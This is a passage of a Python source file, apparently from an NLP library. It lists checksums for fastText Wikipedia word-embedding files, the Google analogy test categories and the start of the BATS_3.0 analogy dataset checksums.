'4867dc74cd53ca0b0f769af4fa1ea420406b59bf'),\n 'wiki.fi': ('wiki.fi.npz',\n '6d1291b854045179f8171ac7d62ede7d8ac159a2'),\n 'wiki.fiu_vro': ('wiki.fiu_vro.npz',\n 'dd87806d9dc8833fa0e21e35a50815ebdbaa6c8b'),\n 'wiki.fj': ('wiki.fj.npz',\n 'cf5c31b0a69276f5dd18ab738ed92444abaeb755'),\n 'wiki.fo': ('wiki.fo.npz',\n 'ffc19807d528af000861a94cfb8097bd686e14fc'),\n 'wiki.fr': ('wiki.fr.npz',\n '8f06d5dbe3cf7214354fe9b2f6eca0ef7419f063'),\n 'wiki.frp': ('wiki.frp.npz',\n 'c8b200ae592478d3cd0bfaafcd7aa19de8a3bfe5'),\n 'wiki.frr': ('wiki.frr.npz',\n 'fa5e5c39ea2a45793c679eacea290a35e37405ea'),\n 'wiki.fur': ('wiki.fur.npz',\n 'a61a8940d059f25000e3fe23933e5ed0d37e65d3'),\n 'wiki.fy': ('wiki.fy.npz',\n '46f9f41bdf6f4fb8e27a753290413d745465963b'),\n 'wiki.gag': ('wiki.gag.npz',\n '49fb01230e6803544122d47ab7d3fe694d1444f2'),\n 'wiki.gan': ('wiki.gan.npz',\n '716b7b26acc15975f30caf3c6effa111516fcca5'),\n 'wiki.ga': ('wiki.ga.npz',\n 'ea934bc1fdc1acf6caf9ac746c6c499251f1fdee'),\n 'wiki.gd': ('wiki.gd.npz',\n '597017b5a32d933f194595d3656f858e37e70a62'),\n 'wiki.glk': ('wiki.glk.npz',\n '91a5834658bc2d48714e8807ef24efb79567b4b5'),\n 'wiki.gl': ('wiki.gl.npz',\n '2fa8e48d6ae1e9c9d542eb3f2156cf9e359e66c2'),\n 'wiki.gn': ('wiki.gn.npz',\n 'e359eef3928e1f1b5d8fcf0ea532e8794c66289a'),\n 'wiki.gom': ('wiki.gom.npz',\n '8cd361481c23f7545cc2bd8f1bf22aa7400edd4d'),\n 'wiki.got': ('wiki.got.npz',\n 'd05daf105611150695e61775fdff2c500b36be3f'),\n 'wiki.gu': ('wiki.gu.npz',\n '0ce175c5fc39bab4032892f70c9d2bb850af0f4a'),\n 'wiki.gv': ('wiki.gv.npz',\n '2c573f873d607831ff01b64603c17b8db79bd7e1'),\n 'wiki.hak': ('wiki.hak.npz',\n 'e6048727799cdf149f5c50037e0fc59300d33a94'),\n 'wiki.ha': ('wiki.ha.npz',\n 'f18ea7286bbd390c5470896b2c99cb1adc740064'),\n 'wiki.haw': ('wiki.haw.npz',\n '18bcd85d2e06b1b889f0835fc5b62697fdf32d72'),\n 'wiki.he': ('wiki.he.npz',\n '76915ff167b6ecb7b7e22ff0ca46914a55d344af'),\n 'wiki.hif': ('wiki.hif.npz',\n '12153aaf98d76d5502ab77a27cd0b9a539f61513'),\n 'wiki.hi': ('wiki.hi.npz',\n '249666a598991f6ec147954c6af9e531fd1cd94e'),\n 'wiki.ho': ('wiki.ho.npz',\n '3f804fd69780c0789708b56ea9d48715f8e38f26'),\n 'wiki.hr': ('wiki.hr.npz',\n '9a3de28e69f97048bfb480b4f83eaab6149f66ad'),\n 'wiki.hsb': ('wiki.hsb.npz',\n '7070bf64e13299dd66ac0e9f8e24011a56b6bfe8'),\n 'wiki.ht': ('wiki.ht.npz',\n 'a607093d511afeb584d02dc676bc5a27eff66287'),\n 'wiki.hu': ('wiki.hu.npz',\n '9b2c4750daf1bcf39768572e874b5afda0e2f0bc'),\n 'wiki.hy': ('wiki.hy.npz',\n 'ec0461a102a6fb00bd324f66cefd3c8d55a7093a'),\n 'wiki.hz': ('wiki.hz.npz',\n '5dfb8afbdae6b4148c3e55ab459c56a74b46b463'),\n 'wiki.ia': ('wiki.ia.npz',\n '4cfaaf053b9513bbf5b2423258c0f01d20256de6'),\n 'wiki.id': ('wiki.id.npz',\n 'bace396bb9941cc9e5b2e5f5a19be6db833c5fd4'),\n 'wiki.ie': ('wiki.ie.npz',\n '1bae7256c2e763ce6d692d1c0a603d99a8b22826'),\n 'wiki.ig': ('wiki.ig.npz',\n 
'23128e54a5e143891d392d621723bad9cfc8cf7b'),\n 'wiki.ii': ('wiki.ii.npz',\n '54bc16d05da512481865a89ecf30260b0acc04dc'),\n 'wiki.ik': ('wiki.ik.npz',\n 'f8015227e893d2375699b7d132b306ba381f02ac'),\n 'wiki.ilo': ('wiki.ilo.npz',\n '185a11f81bd5d24a34558dda81ee4735f5ba150b'),\n 'wiki.io': ('wiki.io.npz',\n 'ddf8180a90aa6ee5be93a2582cc99c535f21363e'),\n 'wiki.is': ('wiki.is.npz',\n '968f8dd2a093b279a6f7aaa734008454bf51d724'),\n 'wiki.it': ('wiki.it.npz',\n 'fdfb857a309b2c3d29482bb5cc55f21b858d2e6f'),\n 'wiki.iu': ('wiki.iu.npz',\n 'fa8896730bd6c24c3473daa22116d1016294e7f7'),\n 'wiki.jam': ('wiki.jam.npz',\n 'a8f0d0b99c89ace0a6401b8fcda261d06065faaf'),\n 'wiki.ja': ('wiki.ja.npz',\n '8d42e5a40e4d1d8645b2d80b873a65cadcf68b5c'),\n 'wiki.jbo': ('wiki.jbo.npz',\n '145fc999ab004b348cf9bf445f0a93a7a145308b'),\n 'wiki.jv': ('wiki.jv.npz',\n '66978770bf06e42414395cf5fd8c596044d72bec'),\n 'wiki.kaa': ('wiki.kaa.npz',\n '624a640ecb9901b2aba2e9f44ab615146ecb2862'),\n 'wiki.kab': ('wiki.kab.npz',\n 'e97f93b6ba65e95c85b7541932cf53c5ad9eb896'),\n 'wiki.ka': ('wiki.ka.npz',\n '1ca8376e1e0cbd58001c1b51a2d488a2874a6743'),\n 'wiki.kbd': ('wiki.kbd.npz',\n 'f2d2a05b06723ac549784ad5470d84f5742a1352'),\n 'wiki.kg': ('wiki.kg.npz',\n 'fa7f6d5f660a173a3e75342d449980eedcdc789e'),\n 'wiki.ki': ('wiki.ki.npz',\n '21a8c7c616c0050c51c288861f3423f313e4f634'),\n 'wiki.kj': ('wiki.kj.npz',\n 'f3c347509a0d81f4f7fdbb8b22889b8d76e5014e'),\n 'wiki.kk': ('wiki.kk.npz',\n 'bc24a3289e1c1e18e16b6789c2f9f92af1e73071'),\n 'wiki.kl': ('wiki.kl.npz',\n 'b8b7e7359f067836e2be2ecfe9f35a820b00fe1d'),\n 'wiki.km': ('wiki.km.npz',\n 'e053799fd01463808432dc035bef3e36620e2f36'),\n 'wiki.kn': ('wiki.kn.npz',\n '2849a0a8b3453e9bf6af05d4c7bd3db881dd1068'),\n 'wiki.koi': ('wiki.koi.npz',\n 'a9b02e9bd41833bcd54769f94626019c03f29997'),\n 'wiki.ko': ('wiki.ko.npz',\n '764d9896e74b5a26c6884d48bce3bed8ed3a7822'),\n 'wiki.krc': ('wiki.krc.npz',\n 'bfe39598c718f1cc95909db7544b3214b308a97c'),\n 'wiki.kr': ('wiki.kr.npz',\n '1e6af853d4a8ea7830e116eb9b61ac5d7d9a315c'),\n 'wiki.ksh': ('wiki.ksh.npz',\n '66cd0e3e0a0b0282a13960571ebe7cddd7706bf2'),\n 'wiki.ks': ('wiki.ks.npz',\n '85f1adaa05b854df4dede745a1aaab3836e60770'),\n 'wiki.ku': ('wiki.ku.npz',\n 'faf90584e5a45e6d0f9eeb88399b82abe037d584'),\n 'wiki.kv': ('wiki.kv.npz',\n '9f2b41822013a412da9c99fac06eed8be03ca192'),\n 'wiki.kw': ('wiki.kw.npz',\n '3eed8a8fc97a2fc79241b8474a458c98d00fc897'),\n 'wiki.ky': ('wiki.ky.npz',\n '0116ff90f10a6c0728e1ea86d8a44896ea83270a'),\n 'wiki.lad': ('wiki.lad.npz',\n '5af2015b3d1c5e8563f0e92721580988ebe2ce50'),\n 'wiki.la': ('wiki.la.npz',\n '7143303a3ea13c7668eb90ea6e3d2ca69857a3be'),\n 'wiki.lbe': ('wiki.lbe.npz',\n 'f206a3c35a184ba5d2b32ee68640eadf66c847da'),\n 'wiki.lb': ('wiki.lb.npz',\n '143dc6337f3690379282034c460c613d7f144923'),\n 'wiki.lez': ('wiki.lez.npz',\n 'b29a680decc6b29f24e8eb9e4f8e11e3419d45f1'),\n 'wiki.lg': ('wiki.lg.npz',\n '866640ce62cedbc1d453b7ea3c289c291ad76e13'),\n 'wiki.lij': ('wiki.lij.npz',\n '0dcd3d7009ae89b1016ca6cdb99a9f0d70bc4baf'),\n 'wiki.li': ('wiki.li.npz',\n '4666b3c238256d7b7623a136db19b8b9f4754734'),\n 'wiki.lmo': ('wiki.lmo.npz',\n 'ac89fa7cfe0675950bcb31c66bf3f88a3cfc98f0'),\n 'wiki.ln': ('wiki.ln.npz',\n 'fba158719944aabe58e0002a90be0ed77e11702d'),\n 'wiki.lo': ('wiki.lo.npz',\n '1e113e340a8a93d385e14502c9c4e3bcdf6c3101'),\n 'wiki.lrc': ('wiki.lrc.npz',\n '42cb755f398fba6f0da7949c91e92b55654bd482'),\n 'wiki.ltg': ('wiki.ltg.npz',\n '182f75859e228d1162215f28fe7f2dca127624a4'),\n 'wiki.lt': ('wiki.lt.npz',\n 
'66aa944bd2e777cb82d6d59b1f2f837b6c48cb37'),\n 'wiki.lv': ('wiki.lv.npz',\n '2be8f926da85694fa998bf79d80b61ebb8d67576'),\n 'wiki.mai': ('wiki.mai.npz',\n 'b8a9c36e2a0f1bb84a44dc762250d2a9007ef637'),\n 'wiki.map_bms': ('wiki.map_bms.npz',\n '6f0394d6b3d08a946e3df4b9355efe94148f018a'),\n 'wiki.mdf': ('wiki.mdf.npz',\n '774ee35334641db57f9ac9069961c5372a5d92e8'),\n 'wiki.mg': ('wiki.mg.npz',\n '496c48ef668f08ce95ebb11ce1ce5026b52d935c'),\n 'wiki.mh': ('wiki.mh.npz',\n '352edd84f99c5aa277a7306f6cacea1fab065ed3'),\n 'wiki.mhr': ('wiki.mhr.npz',\n 'dd78b27a674ac10411cdf74ac32f9391506b17e0'),\n 'wiki.min': ('wiki.min.npz',\n '628b406441ab03bc8aa68195ada50bfdc8226f34'),\n 'wiki.mi': ('wiki.mi.npz',\n '754127b473861cd4f9ae034c9f527a34827b1f00'),\n 'wiki.mk': ('wiki.mk.npz',\n 'b09fed4f56c296f13c4020ef1fec498382a38b73'),\n 'wiki.ml': ('wiki.ml.npz',\n '02fb55d97ca2f0408f0e7e8dd6a661bbc3319a2a'),\n 'wiki.mn': ('wiki.mn.npz',\n '08b2c45689aa5d9ec49df96dc7c777ce9b9a0b4b'),\n 'wiki.mo': ('wiki.mo.npz',\n '638c2e8bd2352fd52921b9ae62f578b8357bab49'),\n 'wiki.mrj': ('wiki.mrj.npz',\n 'ec5cf1f4fb8dfdca64d8172974e620eb8fa41626'),\n 'wiki.mr': ('wiki.mr.npz',\n '074dd68c947c2f137a3e84b55012925f00213139'),\n 'wiki.ms': ('wiki.ms.npz',\n '3dbe9e9d70251de8a374776ff1250a9c3103ee59'),\n 'wiki.mt': ('wiki.mt.npz',\n 'f5103998a68d1b178387417436a83123d44aba01'),\n 'wiki.multi.ar': ('wiki.multi.ar.npz',\n 'a010d1d81a465c56ebaf596b3e8e8795e7f0f8e3'),\n 'wiki.multi.bg': ('wiki.multi.bg.npz',\n 'c04018f3a600cee170f12a36cdd35b4727a2aade'),\n 'wiki.multi.ca': ('wiki.multi.ca.npz',\n 'eef52a0cf20c133ca9065de25f0702861a8cfa29'),\n 'wiki.multi.cs': ('wiki.multi.cs.npz',\n 'c5f547aa78c0e3d7dae67a0334d500bf2a86aa30'),\n 'wiki.multi.da': ('wiki.multi.da.npz',\n '24374f2ee169b33327feeee46da31b0de1622fe4'),\n 'wiki.multi.de': ('wiki.multi.de.npz',\n '2e6c119b345bebd34b56eaaf855d6703889b11f7'),\n 'wiki.multi.el': ('wiki.multi.el.npz',\n '9d122beedb80a2e5334946641e5bafd32c01e76b'),\n 'wiki.multi.en': ('wiki.multi.en.npz',\n '8c3c480b4cb2690304173713a646280613b244a8'),\n 'wiki.multi.es': ('wiki.multi.es.npz',\n '483a22656e4fb2a01e9f4ef8156b261e780850ab'),\n 'wiki.multi.et': ('wiki.multi.et.npz',\n '22498c7b91645a3874fa738b5cfb16bf98b6f97c'),\n 'wiki.multi.fi': ('wiki.multi.fi.npz',\n '765a6f0b63777bff4ae6ca2b461c5889c03d6a70'),\n 'wiki.multi.fr': ('wiki.multi.fr.npz',\n 'decd9aacf600114b8a36072535c0309874a37c83'),\n 'wiki.multi.he': ('wiki.multi.he.npz',\n '7eee940c1b85936f59122f4b1a166223dd946674'),\n 'wiki.multi.hr': ('wiki.multi.hr.npz',\n '1673963416af088f8bf15576afb33d58115db35c'),\n 'wiki.multi.hu': ('wiki.multi.hu.npz',\n 'a1fbe6ededf3cbaa3eaa22dd8b20cce4b36cfc6d'),\n 'wiki.multi.id': ('wiki.multi.id.npz',\n '6c3e721febb511ede7db7bf978d65769e4270f5c'),\n 'wiki.multi.it': ('wiki.multi.it.npz',\n 'fc5bfc11e0165e8d95c1708573dad5e456826c73'),\n 'wiki.multi.mk': ('wiki.multi.mk.npz',\n '6cd50198355674f156fc863108d9bebf11cfabd9'),\n 'wiki.multi.nl': ('wiki.multi.nl.npz',\n '4fa06b9230c95dfa5a9e9a5d80f1f5ba614d3cbf'),\n 'wiki.multi.no': ('wiki.multi.no.npz',\n '63756168c1101e73fba8d1a5015f32b8892819e6'),\n 'wiki.multi.pl': ('wiki.multi.pl.npz',\n '958b8e8bead965ba1bb1433e1c960fc3e12a10fb'),\n 'wiki.multi.pt': ('wiki.multi.pt.npz',\n '22f07df1609d79b95344ee575ea43141424a1528'),\n 'wiki.multi.ro': ('wiki.multi.ro.npz',\n '73180b3e382519004bf38ea7b86237aacbbe813a'),\n 'wiki.multi.ru': ('wiki.multi.ru.npz',\n '3b2eb9163f35e90bf2ce1cd3c997b354d0c34f59'),\n 'wiki.multi.sk': ('wiki.multi.sk.npz',\n 
'606a0c3ba9849070c6b6b8c22d920fdeed9a1385'),\n 'wiki.multi.sl': ('wiki.multi.sl.npz',\n '3cfdab5043b8cfe1535cb6dbd4c9e68847ad5904'),\n 'wiki.multi.sv': ('wiki.multi.sv.npz',\n '4f1494885b9a831e87cfa3c15f2204c4a73c0779'),\n 'wiki.multi.tr': ('wiki.multi.tr.npz',\n '54f90d5ddb9a65538a41e37c5a67ed933a5e4885'),\n 'wiki.multi.uk': ('wiki.multi.uk.npz',\n '500fd26b1d7a25b42458012e99f9f76642e0c787'),\n 'wiki.multi.vi': ('wiki.multi.vi.npz',\n '3955809cceb300965c15f9372221417719bb0db8'),\n 'wiki.mus': ('wiki.mus.npz',\n 'a5f48934a3fa6eaf4929098046c93fc94dd6bcb6'),\n 'wiki.mwl': ('wiki.mwl.npz',\n '8a5e2c272166f8a72c5694ca6c3104d5f49179ec'),\n 'wiki.my': ('wiki.my.npz',\n '5e035aca16700d7d6695af8a6d3a88ac847aaeb7'),\n 'wiki.myv': ('wiki.myv.npz',\n 'd4cfaab70c640033e02c0fc0c5a3615ae836c569'),\n 'wiki.mzn': ('wiki.mzn.npz',\n 'ad09ac584ae455b5862b95125ef409360ae18445'),\n 'wiki.nah': ('wiki.nah.npz',\n '2dc454ef37d059f2053af46cfa1f4f0ca939cba0'),\n 'wiki.na': ('wiki.na.npz',\n '401f0f880eb7aa78d21348bc1e0a3953b3e81bf0'),\n 'wiki.nap': ('wiki.nap.npz',\n '996da46aeeab5644ba766d00c5e343b1553361d7'),\n 'wiki.nds_nl': ('wiki.nds_nl.npz',\n '5a9307e16b13a5a82ec19a52b33254537e7198e7'),\n 'wiki.nds': ('wiki.nds.npz',\n 'b249a87c78c52becf51e7b50aaf9f9b6a36585f1'),\n 'wiki.ne': ('wiki.ne.npz',\n 'a601db2647a74ffd2b4b43dcb8584735f555459c'),\n 'wiki.new': ('wiki.new.npz',\n 'c398a3775aba9c68ce765cfdfb6b188f7c47e4c6'),\n 'wiki-news-300d-1M': ('wiki-news-300d-1M.npz',\n '0a03bbd508e5381e140476140fb121afeb0050ed'),\n 'wiki-news-300d-1M-subword': ('wiki-news-300d-1M-subword.npz',\n '69edae21375407781c727dcb9e534e79d712d137'),\n 'wiki.ng': ('wiki.ng.npz',\n 'befd774d15f69d43547e13e5ea3a97c4cb1ab405'),\n 'wiki.nl': ('wiki.nl.npz',\n '5a7cb6f1dd0a7621202abba9461ac2c5bf905219'),\n 'wiki.nn': ('wiki.nn.npz',\n '8e5059ddeb24050fadaa5cc4622b13feb3e4a226'),\n 'wiki.no': ('wiki.no.npz',\n '5ce6e0f793e66f081652f64013968099de03d9f9'),\n 'wiki.nov': ('wiki.nov.npz',\n '95ed23b4cfd7a65afa1c12c7dbdce6af53923d77'),\n 'wiki.vec': ('wiki.vec.npz',\n '08ebb912efeb9df1c7d05e1af90484d210dff47e'),\n 'wiki.nrm': ('wiki.nrm.npz',\n 'e58614b4508ff9810f0b58fd818f973775bc918d'),\n 'wiki.nso': ('wiki.nso.npz',\n '56a2ebe260241402d117cd89c5c872b9c96ff05b'),\n 'wiki.nv': ('wiki.nv.npz',\n 'c713051fe03ec1f60314bb42161b2a47fb5e169a'),\n 'wiki.ny': ('wiki.ny.npz',\n 'ba5a1725955cbc13e7fd93ab499f8085840c992c'),\n 'wiki.oc': ('wiki.oc.npz',\n '259e7d994c38a4cfc140fb07016b82d6781e5027'),\n 'wiki.olo': ('wiki.olo.npz',\n '0fea70f887def4779ee70a79366b88f1ada65004'),\n 'wiki.om': ('wiki.om.npz',\n '47e2d756b5f8913085d901375c1b4e0b118a4221'),\n 'wiki.or': ('wiki.or.npz',\n '7e274ab060219b019aa02bb97941cc6e162fd01f'),\n 'wiki.os': ('wiki.os.npz',\n '19e8199cc2aaffdb07b6c558dbc5465ac6e03155'),\n 'wiki.pag': ('wiki.pag.npz',\n 'eddf4931547649026c02f893297ef673ec6158bb'),\n 'wiki.pam': ('wiki.pam.npz',\n '40109aa174bd9f0fa657839bb548e2b0646c58d3'),\n 'wiki.pa': ('wiki.pa.npz',\n '8a5870717e9e641b1f757f13259171698118de2e'),\n 'wiki.pap': ('wiki.pap.npz',\n '999c8e5b005ca20d9998fbbe4fa79177f69e24c0'),\n 'wiki.pcd': ('wiki.pcd.npz',\n 'e975066b323a65cdc5e4c27138ef674d2cf7250b'),\n 'wiki.pdc': ('wiki.pdc.npz',\n '5c770b9d56f276b0aa535845f175c05ee1cea615'),\n 'wiki.pfl': ('wiki.pfl.npz',\n '0063d0b633ee529a75482b36ed4f4da7d64994ec'),\n 'wiki.pih': ('wiki.pih.npz',\n 'ce1d76c94d248545eea0d7436c54849dbb380bfc'),\n 'wiki.pi': ('wiki.pi.npz',\n 'c7d56c334bf529f8b3655693d207a80feaec4aed'),\n 'wiki.pl': ('wiki.pl.npz',\n '0d612fdf871a1a4084c867f394940475be899443'),\n 
'wiki.pms': ('wiki.pms.npz',\n 'ca149a2fb138011315bb6d5d61c7a5647e515e51'),\n 'wiki.pnb': ('wiki.pnb.npz',\n '9ec82d02ad8894056c67991cf8ce927bcca74ee2'),\n 'wiki.pnt': ('wiki.pnt.npz',\n '3f90123407bb8fc838a0a0d3700a14e15f5b26aa'),\n 'wiki.ps': ('wiki.ps.npz',\n '7edebc02ac16f5fab83eb10b7d0fab821a9a4d43'),\n 'wiki.pt': ('wiki.pt.npz',\n 'f172fd801edd1ad9d319ba44146d40b5d682a473'),\n 'wiki.qu': ('wiki.qu.npz',\n '68bec60ccfe1826c3b3a8968574488dbc74cdf7b'),\n 'wiki.rm': ('wiki.rm.npz',\n '00fb191fc736ba60cb23e76169dfccde9a9daad0'),\n 'wiki.rmy': ('wiki.rmy.npz',\n 'c5e93cc37ff7293b9a1d9fe55c42d6fbde372b97'),\n 'wiki.rn': ('wiki.rn.npz',\n '57b8e0d6999269be227af6ef2797a9cf8386ff1b'),\n 'wiki.roa_rup': ('wiki.roa_rup.npz',\n 'e06d6b5672a59bb9e83143bc8b28300d23c09546'),\n 'wiki.roa_tara': ('wiki.roa_tara.npz',\n 'c083105f40236dc3711f06c1b40e8ee7a714b99d'),\n 'wiki.ro': ('wiki.ro.npz',\n '766bc0cb58a65b0b1763b9a0d90e91ab982eb20d'),\n 'wiki.rue': ('wiki.rue.npz',\n '9a91fa093cd48d7d658d526b0ccda48dc59cd7f4'),\n 'wiki.ru': ('wiki.ru.npz',\n 'd59d099481c22d5592ab9635c9ee48060aa0bf45'),\n 'wiki.rw': ('wiki.rw.npz',\n 'e99ee87d249f6c157c5c97397d1025d798b85c69'),\n 'wiki.sah': ('wiki.sah.npz',\n '85dae39097b29bc8e2b64f343a77794e4a62f91a'),\n 'wiki.sa': ('wiki.sa.npz',\n '7d1928d7c67400045ac1b35a37a0e3089690d875'),\n 'wiki.scn': ('wiki.scn.npz',\n '27d7b8050bbeed8ce196061c610216760b053c39'),\n 'wiki.sc': ('wiki.sc.npz',\n '69c7b8be0f03a1bbd615695f93bdd78f96a58e16'),\n 'wiki.sco': ('wiki.sco.npz',\n '4880282f59d3338b67fbff75359e2d24896e95bb'),\n 'wiki.sd': ('wiki.sd.npz',\n '0ed8da4d27223db717a612cf0c88582351db6e19'),\n 'wiki.se': ('wiki.se.npz',\n '0f4b2e060d5e29f96ca73aab29c967e79db69c17'),\n 'wiki.sg': ('wiki.sg.npz',\n 'a5e4edf34fe1a88b322da4c3922ec5a470e200c6'),\n 'wiki.sh': ('wiki.sh.npz',\n 'c13f1e94676bc939560193f7aa7ffd7d604707b3'),\n 'wiki.simple': ('wiki.simple.npz',\n '352d0575e7d60b08e1dfce2c5de713906f0ed78f'),\n 'wiki.si': ('wiki.si.npz',\n '204f9ffbe7770a9f56d3b2fb26999165015f5c33'),\n 'wiki.sk': ('wiki.sk.npz',\n '7a9820b5a343b242660bf2595d1ecbf6e00a76d6'),\n 'wiki.sl': ('wiki.sl.npz',\n '85f3186f26d6725317a64e290363a7251b928b81'),\n 'wiki.sm': ('wiki.sm.npz',\n '9e13452cc4bff677f4f15db04f9d2f95f6ec054c'),\n 'wiki.sn': ('wiki.sn.npz',\n 'e8d5f7dcf51280c5f99bc3df849b4889a61e9fcd'),\n 'wiki.so': ('wiki.so.npz',\n '0f5d71b95768b33fd939a870c15344c4478364a9'),\n 'wiki.sq': ('wiki.sq.npz',\n '8b05826df8575e65c87a2fc0b7630cf644d4216d'),\n 'wiki.srn': ('wiki.srn.npz',\n '2711396ef297ac5dde8904508bc002bdecbcc6f4'),\n 'wiki.sr': ('wiki.sr.npz',\n '546edc8e29a5d2e99ed10eb4a552cbef2bb8f417'),\n 'wiki.ss': ('wiki.ss.npz',\n '2e5911bad79bb5270a64f587e326d31c95ec58f3'),\n 'wiki.st': ('wiki.st.npz',\n '23bc954719a2962e891f02efaea754c9ea025894'),\n 'wiki.stq': ('wiki.stq.npz',\n 'dd3ece0c0aa30e53ae0f4b558309bb60ab628652'),\n 'wiki.su': ('wiki.su.npz',\n '7e48732e8a1fcf212e692924a4416a6ac3b3b055'),\n 'wiki.sv': ('wiki.sv.npz',\n 'b9ec52e9423688f195f3145c243226c0e0b51e83'),\n 'wiki.sw': ('wiki.sw.npz',\n '5262f0c645322b10eca73f792a970f10b2719e55'),\n 'wiki.szl': ('wiki.szl.npz',\n 'fdd6d6b291cdbbcec5ff93451a588fdd103bb2d0'),\n 'wiki.ta': ('wiki.ta.npz',\n 'da7c5bc6e1142306ff2669bf1739832beb6c1763'),\n 'wiki.tcy': ('wiki.tcy.npz',\n 'baa49e1afa2bb0dcaaef0fac1ee75bbe711d1134'),\n 'wiki.te': ('wiki.te.npz',\n 'baf48767ce85e4d41d65d25f2bbf1c5f559ec18f'),\n 'wiki.tet': ('wiki.tet.npz',\n '11e46a893af55344dbe102d530fdfea5d949d3bc'),\n 'wiki.tg': ('wiki.tg.npz',\n 'da66abb72ec9ccc602713161e544963d59cc51d7'),\n 
'wiki.th': ('wiki.th.npz',\n '25e54bf2d305779ec9baa5f344410bd75c7702fc'),\n 'wiki.ti': ('wiki.ti.npz',\n '1faf98f3a0eafa7559a4b2a111f43dd1f7b9a05b'),\n 'wiki.tk': ('wiki.tk.npz',\n '34c714fa8275fd6abfe86b2d144a043774552a6c'),\n 'wiki.tl': ('wiki.tl.npz',\n '7d7f8a0485155bce7a74a1d778824375b0029f53'),\n 'wiki.tn': ('wiki.tn.npz',\n 'd0bc3a9b948753ac2283e5e10480c9fa0f6acb53'),\n 'wiki.to': ('wiki.to.npz',\n 'e982fc31bcfcf7339988d7aad21ce29ac9e84b0b'),\n 'wiki.tpi': ('wiki.tpi.npz',\n '448cef043fa4b7f97825dbf8ee205ef05543bcac'),\n 'wiki.tr': ('wiki.tr.npz',\n 'c9830607a4c5134c6191006f1d80bae0ec798fe6'),\n 'wiki.ts': ('wiki.ts.npz',\n '84a0598803712c8a713943447ddb73fc0f39af43'),\n 'wiki.tt': ('wiki.tt.npz',\n '82c29df18f33e6284af3e977a6dda7e132a7a225'),\n 'wiki.tum': ('wiki.tum.npz',\n '358990b894a3fb09d70674465952d828c9b0eda7'),\n 'wiki.tw': ('wiki.tw.npz',\n '1e6d2838a4f271c1808795fb929cfcbf95094d93'),\n 'wiki.ty': ('wiki.ty.npz',\n 'e41ca5192d8cb515b3561c8d6935b150deb027b7'),\n 'wiki.tyv': ('wiki.tyv.npz',\n 'ce062ed32e854604714b65698ae290c99ba28060'),\n 'wiki.udm': ('wiki.udm.npz',\n '9e1c5891ee0c5ac8f65fc457e1b42c7b2bfc8d37'),\n 'wiki.ug': ('wiki.ug.npz',\n '656503e54063e200980e39f00fc011395bcd8551'),\n 'wiki.uk': ('wiki.uk.npz',\n '352b7ee24d9fc6513fff4fe13bc04086c680834a'),\n 'wiki.ur': ('wiki.ur.npz',\n 'a81e55c7adfc2cef779ce9a01fe21319a7e4943b'),\n 'wiki.uz': ('wiki.uz.npz',\n 'd60d1e67bb8574dd71c18c88114aba674fc1eecb'),\n 'wiki.ve': ('wiki.ve.npz',\n '5bfc3dbb3e47d23597df47ef12bd1c64ab8d3ea9'),\n 'wiki.vep': ('wiki.vep.npz',\n '7a94355754fbe56802242c0bf9d7a27335095552'),\n 'wiki.vi': ('wiki.vi.npz',\n 'f118039eb16a4ca3347b6b171eac41113350a041'),\n 'wiki.vls': ('wiki.vls.npz',\n '9a46a2fdc6448aa54f212081643745499ea7d05c'),\n 'wiki.vo': ('wiki.vo.npz',\n '8e2f93c85ac608bcc4ae14093b9ff016061378fb'),\n 'wiki.wa': ('wiki.wa.npz',\n '907074f7743d30cdbb2c48d0c8b4040796ea4164'),\n 'wiki.war': ('wiki.war.npz',\n '928fb410c394b9c18d875326b6a3e750e2611e1b'),\n 'wiki.wo': ('wiki.wo.npz',\n '7bb352be44f7261aa926f49b13e77df30f29312f'),\n 'wiki.wuu': ('wiki.wuu.npz',\n '0d1dc7b05867ff2156a1180ad3da3b4697924e59'),\n 'wiki.xal': ('wiki.xal.npz',\n 'd87f4a131e086dc0bdc2a7e10406820c3c03b6a9'),\n 'wiki.xh': ('wiki.xh.npz',\n 'c64e1d2e77d1c744a628e2bd7353284616e48bea'),\n 'wiki.xmf': ('wiki.xmf.npz',\n '160b9ee9773b9099aaf37ae9bdbc8a4a93b7f6ea'),\n 'wiki.yi': ('wiki.yi.npz',\n '0662542cee29f3392fc905004ac6443b32c1477c'),\n 'wiki.yo': ('wiki.yo.npz',\n '5d12d3b902a1fa19d8548295c3802c0608afa5c8'),\n 'wiki.za': ('wiki.za.npz',\n '536348ff89df62e968739b567a1245bfd4112fbe'),\n 'wiki.zea': ('wiki.zea.npz',\n '61fa192289a7c0f73ffa8035632a38b91c31c224'),\n 'wiki.zh_classical': ('wiki.zh_classical.npz',\n '9acc9eaf8ebe316b945fb1f56ac71a2b7e024854'),\n 'wiki.zh_min_nan': ('wiki.zh_min_nan.npz',\n '5d38bc025c82af578299d60f7df7b399de6ed81a'),\n 'wiki.zh': ('wiki.zh.npz',\n '94007fcf3b105bf2c21b84a3a22bdb7946e74804'),\n 'wiki.zh_yue': ('wiki.zh_yue.npz',\n 'af6f0d94e6418d528d6cedd859e07e6e2fb416ab'),\n 'wiki.zu': ('wiki.zu.npz',\n 'fc9ce07d5d0c49a3c86cf1b26056ada58f9404ca')}\n\nGOOGLEANALOGY_CATEGORIES = [\n 'capital-common-countries', 'capital-world', 'currency', 'city-in-state',\n 'family', 'gram1-adjective-to-adverb', 'gram2-opposite',\n 'gram3-comparative', 'gram4-superlative', 'gram5-present-participle',\n 'gram6-nationality-adjective', 'gram7-past-tense', 'gram8-plural',\n 'gram9-plural-verbs'\n]\n\nBATS_CHECKSUMS = \\\n {'BATS_3.0/1_Inflectional_morphology/I01 [noun - plural_reg].txt':\n 
'cfcba2835edf81abf11b84defd2f4daa3ca0b0bf',\n 'BATS_3.0/1_Inflectional_morphology/I02 [noun - plural_irreg].txt':\n '44dbc56432b79ff5ce2ef80b6840a8aa916524f9',\n 'BATS_3.0/1_Inflectional_morphology/I03 [adj - comparative].txt':\n 'dc530918e98b467b8102a7dab772a66d3db32a73',\n 'BATS_3.0/1_Inflectional_morphology/I04 [adj - superlative].txt':\n '6c6fdfb6c733bc9b298d95013765163f42faf6fb',\n 'BATS_3.0/1_Inflectional_morphology/I05 [verb_inf - 3pSg].txt':\n '39fa47ec7238ddb3f9818bc586f23f55b55418d8',\n 'BATS_3.0/1_Inflectional_morphology/I06 [verb_inf - Ving].txt':\n '8fabeb9f5af6c3e7154a220b7034bbe5b900c36f',\n 'BATS_3.0/1_Inflectional_morphology/I07 [verb_inf - Ved].txt':\n 'aa04df95aa2edb436cbcc03c7b15bc492ece52d6',\n 'BATS_3.0/1_Inflectional_morphology/I08 [verb_Ving - 3pSg].txt':\n '5f22d8121a5043ce76d3b6b53a49a7bb3fe33920',\n 